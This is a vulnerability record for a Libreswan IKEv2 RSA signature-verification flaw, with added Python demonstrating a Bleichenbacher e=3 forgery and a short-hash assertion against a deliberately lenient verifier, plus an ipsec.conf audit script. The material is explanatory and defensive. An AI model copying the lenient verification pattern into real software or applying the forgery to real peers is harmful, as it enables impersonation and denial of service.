CVE-2026-50722 (GCVE-0-2026-50722)
Vulnerability from cvelistv5 – Published: 2026-07-02 21:34 – Updated: 2026-07-02 21:34
Title
IKEv2 Denial of Service via RSA-SHA1 (PKCS#1 RSASSA-PKCS1-v1_5) authentication payload
Summary
Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.
Severity
7.5 (High): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, general scenario (denial of service via the reachable assertion)
8.1 (High): CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H, scenario with a weak RSA exponent (e=3) in use, enabling Bleichenbacher-style signature forgery
Vendor-assessed severity: Medium (the forgery needs e=3 keys, which most cryptographic libraries have refused for over a decade; the DoS is mitigated by the automatic daemon restart)
Assigner
libreswan (The Libreswan Project)
References
4 references
| URL | Tags |
|---|---|
| https://libreswan.org/security/CVE-2026-50722/CVE… | vendor-advisory |
| https://libreswan.org/security/CVE-2026-50722/ | patch |
| https://libreswan.org/security/CVE-2026-50721/CVE… | related |
| https://www.rfc-editor.org/rfc/rfc8017 | technical-description |
Impacted products
1 product
| Vendor | Product | Affected versions | Unaffected versions |
|---|---|---|---|
| The Libreswan Project | libreswan | 0 through 5.3 inclusive (semver) | 5.3.1 (semver) |
Credits
- Yeonghyeon Choi (finder)
- Duyeong Kim (finder)
- Andrew Cagney, The Libreswan Team (analyst)
{
"containers": {
"cna": {
"affected": [
{
"collectionURL": "https://github.com/libreswan/libreswan",
"defaultStatus": "unaffected",
"packageName": "libreswan",
"product": "libreswan",
"programRoutines": [
{
"name": "RSA_authenticate_hash_signature_pkcs1_1_5_rsa"
}
],
"repo": "https://github.com/libreswan/libreswan",
"vendor": "The Libreswan Project",
"versions": [
{
"lessThanOrEqual": "5.3",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "5.3.1",
"versionType": "semver"
}
]
}
],
"configurations": [
{
"lang": "en",
"value": "Any server or client that accepts RSA-based IKEv2 connections via the default authby= settings is vulnerable to denial of service. Authentication bypass additionally requires the use of RSA keys with weak exponents (e=3). IKEv2 by default allows ECDSA, RSA-SSA-PSS, and RSA PKCS#1 1.5 as fallback due to Microsoft Windows not supporting RSASSA-PSS."
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Yeonghyeon Choi"
},
{
"lang": "en",
"type": "finder",
"value": "Duyeong Kim"
},
{
"lang": "en",
"type": "analyst",
"value": "Andrew Cagney (The Libreswan Team)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eLibreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.\u003c/p\u003e"
}
],
"value": "Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected."
}
],
"exploits": [
{
"lang": "en",
"value": "No known exploitation in the wild. The authentication bypass requires the target to use RSA keys with weak exponents (e=3), which have been disallowed by most cryptographic libraries for at least a decade. The denial-of-service attack is exploitable against any IKEv2 configuration using default authby= settings that permit RSA PKCS#1 v1.5 fallback."
}
],
"impacts": [
{
"capecId": "CAPEC-463",
"descriptions": [
{
"lang": "en",
"value": "Denial of Service via assertion failure in pluto daemon when processing malformed RSA PKCS#1 v1.5 AUTH payloads"
}
]
},
{
"capecId": "CAPEC-473",
"descriptions": [
{
"lang": "en",
"value": "Authentication bypass via Bleichenbacher-style signature forgery when weak RSA exponents (e.g., e=3) are in use"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "Weak RSA exponent (e=3) in use, enabling Bleichenbacher signature forgery"
}
]
},
{
"other": {
"content": {
"description": "Vendor-assessed severity: Medium. Authentication bypass requires weak RSA exponents (e=3) which have been disallowed by most cryptographic libraries for over a decade. DoS is mitigated by automatic daemon restart.",
"value": "MEDIUM"
},
"type": "vendorSeverity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-617",
"description": "CWE-617: Reachable Assertion",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-02T21:34:41.413Z",
"orgId": "d42dc95b-23f1-4e06-9076-20753a0fb0df",
"shortName": "libreswan"
},
"references": [
{
"name": "Libreswan Security Advisory CVE-2026-50722",
"tags": [
"vendor-advisory"
],
"url": "https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt"
},
{
"name": "Libreswan CVE-2026-50722 Patches",
"tags": [
"patch"
],
"url": "https://libreswan.org/security/CVE-2026-50722/"
},
{
"name": "Related: CVE-2026-50721 (IKEv1 variant)",
"tags": [
"related"
],
"url": "https://libreswan.org/security/CVE-2026-50721/CVE-2026-50721.txt"
},
{
"name": "RFC 8017 - PKCS #1: RSA Cryptography Specifications Version 2.2",
"tags": [
"technical-description"
],
"url": "https://www.rfc-editor.org/rfc/rfc8017"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUpgrade to libreswan 5.3.1 or later. Patches for libreswan 4.15 and 5.3 are available at \u003ca href=\"https://libreswan.org/security/CVE-2026-50722/\"\u003ehttps://libreswan.org/security/CVE-2026-50722/\u003c/a\u003e\u003c/p\u003e"
}
],
"value": "Upgrade to libreswan 5.3.1 or later. Patches for libreswan 4.15 and 5.3 are available at https://libreswan.org/security/CVE-2026-50722/"
}
],
"source": {
"defects": [
"CVE-2026-50722"
],
"discovery": "EXTERNAL"
},
"taxonomyMappings": [
{
"taxonomyName": "ATT\u0026CK",
"taxonomyRelations": [
{
"relationshipName": "maps to",
"relationshipValue": "Application or System Exploitation (DoS)",
"taxonomyId": "T1499.004"
}
],
"taxonomyVersion": "15.1"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-24T00:00:00.000Z",
"value": "Libreswan notified of the issue via security@libreswan.org"
},
{
"lang": "en",
"time": "2026-06-16T00:00:00.000Z",
"value": "Advanced notice given to supported customers and distributions"
},
{
"lang": "en",
"time": "2026-06-24T00:00:00.000Z",
"value": "Public announcement and release of libreswan 5.3.1"
}
],
"title": "IKEv2 Denial of Service via RSA-SHA1 (PKCS#1 RSASSA-PKCS1-v1_5) authentication payload",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIf Windows support is not needed, configure \u003ccode\u003eauthby=ecdsa\u003c/code\u003e or \u003ccode\u003eauthby=rsa-sha2\u003c/code\u003e (or both via \u003ccode\u003eauthby=ecdsa,rsa-sha2\u003c/code\u003e) to disallow the fallback of RSA PKCS#1 1.5. The \u003ccode\u003eleftauth=\u003c/code\u003e and \u003ccode\u003erightauth=\u003c/code\u003e settings can be updated similarly if those are in use instead of \u003ccode\u003eauthby\u003c/code\u003e.\u003c/p\u003e"
}
],
"value": "If Windows support is not needed, configure authby=ecdsa or authby=rsa-sha2 (or both via authby=ecdsa,rsa-sha2) to disallow the fallback of RSA PKCS#1 1.5. The leftauth= and rightauth= settings can be updated similarly if those are in use instead of authby."
}
],
"x_generator": {
"engine": "cvelib 1.8.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "d42dc95b-23f1-4e06-9076-20753a0fb0df",
"assignerShortName": "libreswan",
"cveId": "CVE-2026-50722",
"datePublished": "2026-07-02T21:34:41.413Z",
"dateReserved": "2026-06-05T16:10:05.751Z",
"dateUpdated": "2026-07-02T21:34:41.413Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-50722\",\"sourceIdentifier\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"published\":\"2026-07-02T22:16:43.550\",\"lastModified\":\"2026-07-02T22:16:43.550\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.\"}],\"affected\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"affectedData\":[{\"vendor\":\"The Libreswan Project\",\"product\":\"libreswan\",\"defaultStatus\":\"unaffected\",\"collectionURL\":\"https://github.com/libreswan/libreswan\",\"packageName\":\"libreswan\",\"programRoutines\":[{\"name\":\"RSA_authenticate_hash_signature_pkcs1_1_5_rsa\"}],\"repo\":\"https://github.com/libreswan/libreswan\",\"versions\":[{\"version\":\"0\",\"lessThanOrEqual\":\"5.3\",\"versionType\":\"semver\",\"status\":\"affected\"},{\"version\":\"5.3.1\",\"versionType\":\"semver\",\"status\":\"unaffected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-347\"},{\"lang\":\"en\",\"value\":\"CWE-617\"}]}],\"references\":[{\"url\":\"https://libreswan.org/security/CVE-2026-50721/CVE-2026-50721.txt\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://libreswan.org/security/CVE-2026-50722/\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"},{\"url\":\"https://www.rfc-editor.org/rfc/rfc8017\",\"source\":\"d42dc95b-23f1-4e06-9076-20753a0fb0df\"}]}}"
}
}
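The description above names two consequences of one mistake: the verifier did not check the DER encoding of the DigestInfo, which is exactly the gap Bleichenbacher's 2006 low-exponent forgery needs when e=3, and a shorter-than-expected hash reached an assertion instead of a clean failure. The Python below is an added illustration written for this page; it is not libreswan's RSA_authenticate_hash_signature_pkcs1_1_5_rsa() and does not claim to reproduce its exact code. It pairs a lenient verifier that parses the recovered EM and trusts the peer's length bytes (the pattern both issues abuse) with a strict one that rebuilds EM from the message and compares every byte, as RFC 8017 section 8.2.2 requires. The deterministic 1024-bit e=3 demo key, the SHA-1 DigestInfo, the message bytes, the four-FF padding in the forgery and the 4-byte short digest are all constructed here; how pluto chooses the key it verifies against is not modelled, so the malformed EM is simply signed with the demo private key, standing in for any peer that holds a private key the verifier will use.

```python
"""Added illustration (not libreswan code): parse-then-compare versus rebuild-and-compare
for RSASSA-PKCS1-v1_5 (RFC 8017), with a Bleichenbacher e=3 forgery and a short-hash assertion."""
import hashlib, hmac, random

SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # RFC 8017 9.2 note 1
K = 128  # octet length of the constructed 1024-bit modulus

def _is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin; rng is seeded so the demo key is reproducible."""
    if any(n % p == 0 for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def make_key(e=3, seed=2026):
    """Deterministic demo key (n, e, d); the weak exponent e=3 is deliberate."""
    rng, primes = random.Random(seed), []
    while len(primes) < 2:
        p = rng.getrandbits(512) | (1 << 511) | 1
        if (p - 1) % e and _is_probable_prime(p, rng):   # gcd(e, p-1) must be 1
            primes.append(p)
    p, q = primes
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def emsa_encode(msg):
    """RFC 8017 9.2: EM = 00 || 01 || PS (at least 8 bytes of FF) || 00 || DigestInfo."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t

def raw_sign(em, key):
    """Textbook RSA over an arbitrary EM: a peer holding a private key can emit any EM."""
    return pow(int.from_bytes(em, "big"), key[2], key[0]).to_bytes(K, "big")

def recover_em(sig, key):
    return pow(int.from_bytes(sig, "big"), key[1], key[0]).to_bytes(K, "big")

def verify_lenient(msg, sig, key):
    """Buggy pattern: walk the recovered EM and trust what the peer encoded."""
    em, i = recover_em(sig, key), 2
    while i < K and em[i] == 0xFF:            # PS length is never checked
        i += 1
    if em[:2] != b"\x00\x01" or i >= K or em[i] != 0x00:
        return False
    t = em[i + 1:]   # SEQUENCE { SEQUENCE { OID sha1, NULL }, OCTET STRING }; outer length ignored
    if t[0] != 0x30 or t[2:13] != SHA1_DIGESTINFO[2:13] or t[13] != 0x04:
        return False
    got = t[15:15 + t[14]]                    # t[14] is the peer-chosen digest length
    # The code "knows" SHA-1 digests are 20 bytes, but the peer chose t[14]: a shorter
    # digest lands on this assertion (the CWE-617 shape the advisory describes).
    assert len(got) == 20, "digest length mismatch"
    # Bytes after the digest are never examined: the unchecked tail the e=3 forgery needs.
    return got == hashlib.sha1(msg).digest()

def verify_strict(msg, sig, key):
    """RFC 8017 8.2.2 step 4: rebuild EM' from the message and compare every byte."""
    return hmac.compare_digest(recover_em(sig, key), emsa_encode(msg))

def forge_e3(msg, key):
    """Bleichenbacher (2006) forgery against verify_lenient(): cube root, rounded up, of
    00 01 FF FF FF FF 00 || DigestInfo || zeros; cubing back only disturbs the ignored tail."""
    n, e, _ = key
    assert e == 3
    prefix = b"\x00\x01" + b"\xff" * 4 + b"\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    target = int.from_bytes(prefix.ljust(K, b"\x00"), "big")
    lo, hi = 0, 1 << (target.bit_length() // 3 + 2)
    while lo < hi:                            # binary search: smallest s with s**3 >= target
        mid = (lo + hi) // 2
        lo, hi = (mid + 1, hi) if mid ** 3 < target else (lo, mid)
    assert lo ** 3 < n and (lo ** 3).to_bytes(K, "big").startswith(prefix)
    return lo.to_bytes(K, "big")

def short_hash_em(hash_len=4):
    """Constructed malformed EM whose DigestInfo claims a hash_len-byte SHA-1 digest."""
    t = bytes([0x30, 13 + hash_len]) + SHA1_DIGESTINFO[2:14] + bytes([hash_len]) + b"\xaa" * hash_len
    return b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t

def demo():
    key, msg = make_key(), b"constructed IKEv2 InitiatorSignedOctets"
    genuine, forged = raw_sign(emsa_encode(msg), key), forge_e3(msg, key)
    malformed = raw_sign(short_hash_em(), key)
    try:
        verify_lenient(msg, malformed, key)
        asserted = False
    except AssertionError:
        asserted = True                       # pluto's analogue: abort and restart
    return {"lenient_genuine": verify_lenient(msg, genuine, key), "lenient_forged": verify_lenient(msg, forged, key),
            "strict_genuine": verify_strict(msg, genuine, key), "strict_forged": verify_strict(msg, forged, key),
            "lenient_short_hash_asserts": asserted, "strict_short_hash": verify_strict(msg, malformed, key)}
```

Running demo() shows the lenient verifier accepting both the genuine signature and the e=3 forgery and aborting on the short digest, while the strict verifier accepts only the genuine signature and treats the malformed DigestInfo as an ordinary mismatch. The forgery works here because the 86-byte tail that the cube-rounding error lands in is larger than the roughly 2^679 error bound for a 1024-bit modulus; with e=65537 there is no such trick, which is why the advisory limits the impersonation to weak exponents, whereas the assertion path needs no exponent property at all, only a verifier that parses what the peer sent.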
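The workaround in the record (authby=ecdsa,rsa-sha2, or leftauth=/rightauth= changed the same way) is a one-line edit per connection, but on a gateway with many conn sections the first task is finding which ones still permit the fallback. The Python below is an added example written for this page, not a libreswan tool: it parses the ipsec.conf layout (config setup, conn %default, conn <name>, '#' comments) and flags connections that would still accept an RSASSA-PKCS1-v1_5 AUTH payload. Its mapping from setting values to behaviour is an assumption taken from the advisory text and the ipsec.conf manual: no authby= at all (the default), or authby=/leftauth=/rightauth= naming rsasig or rsa-sha1, counts as allowing the fallback, while ecdsa* and rsa-sha2* do not. The sample configuration is constructed, and also= inheritance is not followed.

```python
"""Added example (not a libreswan tool): list ipsec.conf connections that still allow the
RSA PKCS#1 v1.5 fallback which the advisory's workaround (authby=ecdsa,rsa-sha2) disables."""

# Assumption from the advisory and the ipsec.conf manual: these method names keep the
# v1.5 fallback reachable; anything ecdsa* or rsa-sha2* does not.
FALLBACK_METHODS = {"rsasig", "rsa-sha1"}

def parse_ipsec_conf(text):
    """Return {conn_name: {key: value}} with 'conn %default' merged into every conn.
    Section headers start in column 0; settings are indented; '#' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line[0].isspace():
            kind, _, name = line.strip().partition(" ")
            current = sections.setdefault(name.strip(), {}) if kind == "conn" else None
        elif current is not None and "=" in line:
            key, value = line.strip().split("=", 1)
            current[key.strip()] = value.strip()
    defaults = sections.pop("%default", {})
    return {name: {**defaults, **conf} for name, conf in sections.items()}

def _methods(value):
    return {m.strip().lower() for m in value.split(",") if m.strip()}

def allows_pkcs1_v15(conf):
    """True when the conn's authentication settings still permit the v1.5 fallback."""
    if "leftauth" in conf or "rightauth" in conf:
        used = _methods(conf.get("leftauth", "")) | _methods(conf.get("rightauth", ""))
    elif "authby" in conf:
        used = _methods(conf["authby"])
    else:
        return True                     # default authby: fallback permitted per the advisory
    return bool(used & FALLBACK_METHODS)

def audit(text):
    """Map conn name -> (allows fallback?, the setting(s) that decided it)."""
    report = {}
    for name, conf in parse_ipsec_conf(text).items():
        setting = " ".join(f"{k}={conf[k]}" for k in ("authby", "leftauth", "rightauth") if k in conf)
        report[name] = (allows_pkcs1_v15(conf), setting or "(default authby)")
    return report

SAMPLE_CONF = """\
# constructed sample ipsec.conf, not taken from any real deployment
config setup
    logfile=/var/log/pluto.log

conn %default
    keyexchange=ikev2
    left=%defaultroute

conn site-default        # no authby= at all: libreswan default, fallback on
    right=192.0.2.10
    leftid=@hq
    rightid=@branch

conn site-windows        # explicit PKCS#1 v1.5 for a Windows peer
    right=192.0.2.11
    authby=rsa-sha1

conn site-hardened       # the advisory's workaround
    right=192.0.2.12
    authby=ecdsa,rsa-sha2

conn site-asymmetric     # leftauth/rightauth form, one side still rsasig
    right=192.0.2.13
    leftauth=rsa-sha2
    rightauth=rsasig
"""

if __name__ == "__main__":
    for conn, (weak, setting) in audit(SAMPLE_CONF).items():
        print(f"{'FALLBACK' if weak else 'ok      '}  {conn:16} {setting}")
```

Run it against the real file with audit(open("/etc/ipsec.conf").read()); every conn reported as FALLBACK either needs the authby=ecdsa,rsa-sha2 change from the record or, where a Windows peer genuinely requires PKCS#1 v1.5, the 5.3.1 upgrade or the vendor patch. Connections pulled in via include= or also= are not expanded by this parser, so check those by hand.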